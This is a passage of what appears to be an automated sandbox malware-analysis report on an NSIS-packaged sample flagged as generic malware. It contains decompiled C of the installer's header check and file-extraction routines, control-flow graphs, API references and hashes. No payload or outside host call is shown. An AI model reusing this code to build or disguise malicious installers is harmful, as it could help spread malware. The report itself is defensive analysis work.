                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-1664645273
                                                              • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                              • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                              • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                              • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 381 40336a-40336e 378->381 387 403243-403251 call 40302e 379->387 388 40315e 379->388 394 403322-403327 387->394 395 403257-40325a 387->395 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 401 40318d-403194 393->401 402 4032de-4032e6 call 40302e 393->402 394->381 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 395->397 398 40325c-403274 call 4035f8 call 4035e2 395->398 422 4032d4-4032d9 397->422 423 4032e8-403318 call 4035f8 call 403371 397->423 398->394 425 40327a-403280 398->425 406 403210-403214 401->406 407 403196-4031aa call 406113 401->407 402->394 412 403216-40321d call 40302e 406->412 413 40321e-403224 406->413 407->413 421 4031ac-4031b3 407->421 412->413 418 403233-40323b 413->418 419 403226-403230 call 406b22 413->419 418->390 424 403241 418->424 419->418 421->413 429 4031b5-4031bc 421->429 422->381 436 40331d-403320 423->436 424->387 425->394 425->397 429->413 431 4031be-4031c5 429->431 431->413 433 4031c7-4031ce 431->433 433->413 435 4031d0-4031f0 433->435 435->394 437 4031f6-4031fa 435->437 436->394 438 403329-40333a 436->438 439 403202-40320a 437->439 440 4031fc-403200 437->440 441 403342-403347 438->441 442 40333c 438->442 439->413 443 40320c-40320e 439->443 440->424 440->439 444 403348-40334e 441->444 442->441 443->413 444->444 445 403350-403368 call 406113 444->445 445->381
                                                              C-Code - Quality: 99%
                                                              			E004030D0(void* __eflags, signed int _a4) {
                                                              				DWORD* _v8;
                                                              				DWORD* _v12;
                                                              				intOrPtr _v16;
                                                              				long _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				signed int _v40;
                                                              				short _v560;
                                                              				signed int _t54;
                                                              				void* _t57;
                                                              				void* _t62;
                                                              				intOrPtr _t65;
                                                              				void* _t68;
                                                              				intOrPtr* _t70;
                                                              				intOrPtr _t71;
                                                              				signed int _t77;
                                                              				signed int _t82;
                                                              				signed int _t83;
                                                              				signed int _t89;
                                                              				intOrPtr _t92;
                                                              				long _t94;
                                                              				signed int _t102;
                                                              				signed int _t104;
                                                              				void* _t106;
                                                              				signed int _t107;
                                                              				signed int _t110;
                                                              				void* _t111;
                                                              
                                                              				_t94 = 0;
                                                              				_v8 = 0;
                                                              				_v12 = 0;
                                                              				 *0x42a26c = GetTickCount() + 0x3e8;
                                                              				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe", 0x400);
                                                              				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe", 0x80000000, 3);
                                                              				 *0x40a018 = _t106;
                                                              				if(_t106 == 0xffffffff) {
                                                              					return L"Error launching installer";
                                                              				}
                                                              				E00406668(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.generic.ml.10062.exe");
                                                              				E00406668(0x439000, E00405F83(L"C:\\Users\\Arthur\\Desktop"));
                                                              				_t54 = GetFileSize(_t106, 0);
                                                              				__eflags = _t54;
                                                              				 *0x420f00 = _t54;
                                                              				_t110 = _t54;
                                                              				if(_t54 <= 0) {
                                                              					L24:
                                                              					E0040302E(1);
                                                              					__eflags =  *0x42a274 - _t94;
                                                              					if( *0x42a274 == _t94) {
                                                              						goto L32;
                                                              					}
                                                              					__eflags = _v12 - _t94;
                                                              					if(_v12 == _t94) {
                                                              						L28:
                                                              						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                              						_t111 = _t57;
                                                              						E00406B90(0x40ce68);
                                                              						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                              						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                              						__eflags = _t62 - 0xffffffff;
                                                              						 *0x40a01c = _t62;
                                                              						if(_t62 != 0xffffffff) {
                                                              							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                              							 *0x420f04 = _t65;
                                                              							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                              							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                              							__eflags = _t68 - _v20;
                                                              							if(_t68 == _v20) {
                                                              								__eflags = _v40 & 0x00000001;
                                                              								 *0x42a270 = _t111;
                                                              								 *0x42a278 =  *_t111;
                                                              								if((_v40 & 0x00000001) != 0) {
                                                              									 *0x42a27c =  *0x42a27c + 1;
                                                              									__eflags =  *0x42a27c;
                                                              								}
                                                              								_t45 = _t111 + 0x44; // 0x44
                                                              								_t70 = _t45;
                                                              								_t102 = 8;
                                                              								do {
                                                              									_t70 = _t70 - 8;
                                                              									 *_t70 =  *_t70 + _t111;
                                                              									_t102 = _t102 - 1;
                                                              									__eflags = _t102;
                                                              								} while (_t102 != 0);
                                                              								_t71 =  *0x420ef4; // 0x788b
                                                              								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                              								E00406113(0x42a280, _t111 + 4, 0x40);
                                                              								__eflags = 0;
                                                              								return 0;
                                                              							}
                                                              							goto L32;
                                                              						}
                                                              						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                              					}
                                                              					E004035F8( *0x420ef0);
                                                              					_t77 = E004035E2( &_a4, 4);
                                                              					__eflags = _t77;
                                                              					if(_t77 == 0) {
                                                              						goto L32;
                                                              					}
                                                              					__eflags = _v8 - _a4;
                                                              					if(_v8 != _a4) {
                                                              						goto L32;
                                                              					}
                                                              					goto L28;
                                                              				} else {
                                                              					do {
                                                              						_t107 = _t110;
                                                              						asm("sbb eax, eax");
                                                              						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                              						__eflags = _t110 - _t82;
                                                              						if(_t110 >= _t82) {
                                                              							_t107 = _t82;
                                                              						}
                                                              						_t83 = E004035E2(0x418ef0, _t107);
                                                              						__eflags = _t83;
                                                              						if(_t83 == 0) {
                                                              							E0040302E(1);
                                                              							L32:
                                                              							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                              						}
                                                              						__eflags =  *0x42a274;
                                                              						if( *0x42a274 != 0) {
                                                              							__eflags = _a4 & 0x00000002;
                                                              							if((_a4 & 0x00000002) == 0) {
                                                              								E0040302E(0);
                                                              							}
                                                              							goto L20;
                                                              						}
                                                              						E00406113( &_v40, 0x418ef0, 0x1c);
                                                              						_t89 = _v40;
                                                              						__eflags = _t89 & 0xfffffff0;
                                                              						if((_t89 & 0xfffffff0) != 0) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v36 - 0xdeadbeef;
                                                              						if(_v36 != 0xdeadbeef) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v24 - 0x74736e49;
                                                              						if(_v24 != 0x74736e49) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v28 - 0x74666f73;
                                                              						if(_v28 != 0x74666f73) {
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _v32 - 0x6c6c754e;
                                                              						if(_v32 != 0x6c6c754e) {
                                                              							goto L20;
                                                              						}
                                                              						_a4 = _a4 | _t89;
                                                              						_t104 =  *0x420ef0; // 0x39ad6
                                                              						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                              						_t92 = _v16;
                                                              						__eflags = _t92 - _t110;
                                                              						 *0x42a274 = _t104;
                                                              						if(_t92 > _t110) {
                                                              							goto L32;
                                                              						}
                                                              						__eflags = _a4 & 0x00000008;
                                                              						if((_a4 & 0x00000008) != 0) {
                                                              							L16:
                                                              							_v12 = _v12 + 1;
                                                              							_t110 = _t92 - 4;
                                                              							__eflags = _t107 - _t110;
                                                              							if(_t107 > _t110) {
                                                              								_t107 = _t110;
                                                              							}
                                                              							goto L20;
                                                              						}
                                                              						__eflags = _a4 & 0x00000004;
                                                              						if((_a4 & 0x00000004) != 0) {
                                                              							break;
                                                              						}
                                                              						goto L16;
                                                              						L20:
                                                              						__eflags = _t110 -  *0x420f00; // 0x3a12d
                                                              						if(__eflags < 0) {
                                                              							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                              						}
                                                              						 *0x420ef0 =  *0x420ef0 + _t107;
                                                              						_t110 = _t110 - _t107;
                                                              						__eflags = _t110;
                                                              					} while (_t110 != 0);
                                                              					_t94 = 0;
                                                              					__eflags = 0;
                                                              					goto L24;
                                                              				}
                                                              			}
































                                                              0x004030db
                                                              0x004030de
                                                              0x004030e1
                                                              0x004030fb
                                                              0x00403100
                                                              0x00403113
                                                              0x00403118
                                                              0x0040311e
                                                              0x00000000
                                                              0x00403120
                                                              0x00403131
                                                              0x00403142
                                                              0x00403149
                                                              0x0040314f
                                                              0x00403151
                                                              0x00403156
                                                              0x00403158
                                                              0x00403243
                                                              0x00403245
                                                              0x0040324a
                                                              0x00403251
                                                              0x00000000
                                                              0x00000000
                                                              0x00403257
                                                              0x0040325a
                                                              0x00403286
                                                              0x0040328b
                                                              0x00403296
                                                              0x00403298
                                                              0x004032a9
                                                              0x004032c4
                                                              0x004032ca
                                                              0x004032cd
                                                              0x004032d2
                                                              0x004032f1
                                                              0x00403301
                                                              0x00403313
                                                              0x00403318
                                                              0x0040331d
                                                              0x00403320
                                                              0x00403329
                                                              0x0040332d
                                                              0x00403335
                                                              0x0040333a
                                                              0x0040333c
                                                              0x0040333c
                                                              0x0040333c
                                                              0x00403344
                                                              0x00403344
                                                              0x00403347
                                                              0x00403348
                                                              0x00403348
                                                              0x0040334b
                                                              0x0040334d
                                                              0x0040334d
                                                              0x0040334d
                                                              0x00403350
                                                              0x00403357
                                                              0x00403363
                                                              0x00403368
                                                              0x00000000
                                                              0x00403368
                                                              0x00000000
                                                              0x00403320
                                                              0x00000000
                                                              0x004032d4
                                                              0x00403262
                                                              0x0040326d
                                                              0x00403272
                                                              0x00403274
                                                              0x00000000
                                                              0x00000000
                                                              0x0040327d
                                                              0x00403280
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040315e
                                                              0x00403163
                                                              0x00403168
                                                              0x0040316c
                                                              0x00403173
                                                              0x00403178
                                                              0x0040317a
                                                              0x0040317c
                                                              0x0040317c
                                                              0x00403180
                                                              0x00403185
                                                              0x00403187
                                                              0x004032e0
                                                              0x00403322
                                                              0x00000000
                                                              0x00403322
                                                              0x0040318d
                                                              0x00403194
                                                              0x00403210
                                                              0x00403214
                                                              0x00403218
                                                              0x0040321d
                                                              0x00000000
                                                              0x00403214
                                                              0x0040319d
                                                              0x004031a2
                                                              0x004031a5
                                                              0x004031aa
                                                              0x00000000
                                                              0x00000000
                                                              0x004031ac
                                                              0x004031b3
                                                              0x00000000
                                                              0x00000000
                                                              0x004031b5
                                                              0x004031bc
                                                              0x00000000
                                                              0x00000000
                                                              0x004031be
                                                              0x004031c5
                                                              0x00000000
                                                              0x00000000
                                                              0x004031c7
                                                              0x004031ce
                                                              0x00000000
                                                              0x00000000
                                                              0x004031d0
                                                              0x004031d6
                                                              0x004031df
                                                              0x004031e5
                                                              0x004031e8
                                                              0x004031ea
                                                              0x004031f0
                                                              0x00000000
                                                              0x00000000
                                                              0x004031f6
                                                              0x004031fa
                                                              0x00403202
                                                              0x00403202
                                                              0x00403205
                                                              0x00403208
                                                              0x0040320a
                                                              0x0040320c
                                                              0x0040320c
                                                              0x00000000
                                                              0x0040320a
                                                              0x004031fc
                                                              0x00403200
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040321e
                                                              0x0040321e
                                                              0x00403224
                                                              0x00403230
                                                              0x00403230
                                                              0x00403233
                                                              0x00403239
                                                              0x00403239
                                                              0x00403239
                                                              0x00403241
                                                              0x00403241
                                                              0x00000000
                                                              0x00403241

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,00000400), ref: 00403100
                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 0040615C
                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 00403149
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-357488492
                                                              • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                              • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                              • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                              • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 733 40176f-401794 call 402da6 call 405fae 738 401796-40179c call 406668 733->738 739 40179e-4017b0 call 406668 call 405f37 lstrcatW 733->739 745 4017b5-4017b6 call 4068ef 738->745 739->745 748 4017bb-4017bf 745->748 749 4017c1-4017cb call 40699e 748->749 750 4017f2-4017f5 748->750 757 4017dd-4017ef 749->757 758 4017cd-4017db CompareFileTime 749->758 752 4017f7-4017f8 call 406133 750->752 753 4017fd-401819 call 406158 750->753 752->753 760 40181b-40181e 753->760 761 40188d-4018b6 call 4056ca call 403371 753->761 757->750 758->757 762 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 760->762 763 40186f-401879 call 4056ca 760->763 775 4018b8-4018bc 761->775 776 4018be-4018ca SetFileTime 761->776 762->748 797 401864-401865 762->797 773 401882-401888 763->773 777 402c33 773->777 775->776 779 4018d0-4018db CloseHandle 775->779 776->779 780 402c35-402c39 777->780 782 4018e1-4018e4 779->782 783 402c2a-402c2d 779->783 785 4018e6-4018f7 call 4066a5 lstrcatW 782->785 786 4018f9-4018fc call 4066a5 782->786 783->777 790 401901-402398 785->790 786->790 795 40239d-4023a2 790->795 796 402398 call 405cc8 790->796 795->780 796->795 797->773 798 401867-401868 797->798 798->763
                                                              C-Code - Quality: 77%
                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                              				void* __esi;
                                                              				void* _t35;
                                                              				void* _t43;
                                                              				void* _t45;
                                                              				FILETIME* _t51;
                                                              				FILETIME* _t64;
                                                              				void* _t66;
                                                              				signed int _t72;
                                                              				FILETIME* _t73;
                                                              				FILETIME* _t77;
                                                              				signed int _t79;
                                                              				WCHAR* _t81;
                                                              				void* _t83;
                                                              				void* _t84;
                                                              				void* _t86;
                                                              
                                                              				_t77 = __ebx;
                                                              				 *(_t86 - 8) = E00402DA6(0x31);
                                                              				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                              				_t35 = E00405FAE( *(_t86 - 8));
                                                              				_push( *(_t86 - 8));
                                                              				_t81 = L"Call";
                                                              				if(_t35 == 0) {
                                                              					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
                                                              				} else {
                                                              					E00406668();
                                                              				}
                                                              				E004068EF(_t81);
                                                              				while(1) {
                                                              					__eflags =  *(_t86 + 8) - 3;
                                                              					if( *(_t86 + 8) >= 3) {
                                                              						_t66 = E0040699E(_t81);
                                                              						_t79 = 0;
                                                              						__eflags = _t66 - _t77;
                                                              						if(_t66 != _t77) {
                                                              							_t73 = _t66 + 0x14;
                                                              							__eflags = _t73;
                                                              							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                              						}
                                                              						asm("sbb eax, eax");
                                                              						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                              						__eflags = _t72;
                                                              						 *(_t86 + 8) = _t72;
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - _t77;
                                                              					if( *(_t86 + 8) == _t77) {
                                                              						E00406133(_t81);
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - 1;
                                                              					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                              					__eflags = _t43 - 0xffffffff;
                                                              					 *(_t86 - 0x38) = _t43;
                                                              					if(_t43 != 0xffffffff) {
                                                              						break;
                                                              					}
                                                              					__eflags =  *(_t86 + 8) - _t77;
                                                              					if( *(_t86 + 8) != _t77) {
                                                              						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                              						__eflags =  *(_t86 + 8) - 2;
                                                              						if(__eflags == 0) {
                                                              							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                              						}
                                                              						L31:
                                                              						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                              						__eflags =  *0x42a2e8;
                                                              						goto L32;
                                                              					} else {
                                                              						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp", _t83);
                                                              						E00406668(_t83, _t81);
                                                              						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                              						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp");
                                                              						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                              						__eflags = _t64;
                                                              						if(_t64 == 0) {
                                                              							continue;
                                                              						} else {
                                                              							__eflags = _t64 == 1;
                                                              							if(_t64 == 1) {
                                                              								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                              								L32:
                                                              								_t51 = 0;
                                                              								__eflags = 0;
                                                              							} else {
                                                              								_push(_t81);
                                                              								_push(0xfffffffa);
                                                              								E004056CA();
                                                              								L29:
                                                              								_t51 = 0x7fffffff;
                                                              							}
                                                              						}
                                                              					}
                                                              					L33:
                                                              					return _t51;
                                                              				}
                                                              				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
                                                              				 *0x42a314 =  *0x42a314 + 1;
                                                              				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                              				 *0x42a314 =  *0x42a314 - 1;
                                                              				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                              				_t84 = _t45;
                                                              				if( *(_t86 - 0x24) != 0xffffffff) {
                                                              					L22:
                                                              					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                              				} else {
                                                              					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                              					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                              						goto L22;
                                                              					}
                                                              				}
                                                              				CloseHandle( *(_t86 - 0x38)); // executed
                                                              				__eflags = _t84 - _t77;
                                                              				if(_t84 >= _t77) {
                                                              					goto L31;
                                                              				} else {
                                                              					__eflags = _t84 - 0xfffffffe;
                                                              					if(_t84 != 0xfffffffe) {
                                                              						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                              					} else {
                                                              						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                              						lstrcatW(_t81,  *(_t86 - 8));
                                                              					}
                                                              					_push(0x200010);
                                                              					_push(_t81);
                                                              					E00405CC8();
                                                              					goto L29;
                                                              				}
                                                              				goto L33;
                                                              			}


















                                                              0x0040176f
                                                              0x00401776
                                                              0x00401782
                                                              0x00401785
                                                              0x0040178a
                                                              0x0040178d
                                                              0x00401794
                                                              0x004017b0
                                                              0x00401796
                                                              0x00401797
                                                              0x00401797
                                                              0x004017b6
                                                              0x004017bb
                                                              0x004017bb
                                                              0x004017bf
                                                              0x004017c2
                                                              0x004017c7
                                                              0x004017c9
                                                              0x004017cb
                                                              0x004017d0
                                                              0x004017d0
                                                              0x004017db
                                                              0x004017db
                                                              0x004017ec
                                                              0x004017ee
                                                              0x004017ee
                                                              0x004017ef
                                                              0x004017ef
                                                              0x004017f2
                                                              0x004017f5
                                                              0x004017f8
                                                              0x004017f8
                                                              0x004017ff
                                                              0x0040180e
                                                              0x00401813
                                                              0x00401816
                                                              0x00401819
                                                              0x00000000
                                                              0x00000000
                                                              0x0040181b
                                                              0x0040181e
                                                              0x00401874
                                                              0x00401879
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402c2a
                                                              0x00402c2d
                                                              0x00402c2d
                                                              0x00000000
                                                              0x00401820
                                                              0x00401826
                                                              0x0040182d
                                                              0x0040183a
                                                              0x00401845
                                                              0x0040185b
                                                              0x0040185b
                                                              0x0040185e
                                                              0x00000000
                                                              0x00401864
                                                              0x00401864
                                                              0x00401865
                                                              0x00401882
                                                              0x00402c33
                                                              0x00402c33
                                                              0x00402c33
                                                              0x00401867
                                                              0x00401867
                                                              0x00401868
                                                              0x00401493
                                                              0x0040239d
                                                              0x0040239d
                                                              0x0040239d
                                                              0x00401865
                                                              0x0040185e
                                                              0x00402c35
                                                              0x00402c39
                                                              0x00402c39
                                                              0x00401892
                                                              0x00401897
                                                              0x004018a5
                                                              0x004018aa
                                                              0x004018b0
                                                              0x004018b4
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018ca
                                                              0x004018b8
                                                              0x004018b8
                                                              0x004018bc
                                                              0x00000000
                                                              0x00000000
                                                              0x004018bc
                                                              0x004018d3
                                                              0x004018d9
                                                              0x004018db
                                                              0x00000000
                                                              0x004018e1
                                                              0x004018e1
                                                              0x004018e4
                                                              0x004018fc
                                                              0x004018e6
                                                              0x004018e9
                                                              0x004018f2
                                                              0x004018f2
                                                              0x00401901
                                                              0x00401906
                                                              0x00402398
                                                              0x00000000
                                                              0x00402398
                                                              0x00000000

                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi821.tmp$C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll$Call
                                                              • API String ID: 1941528284-2862896636
                                                              • Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                              • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                              • Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
                                                              • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
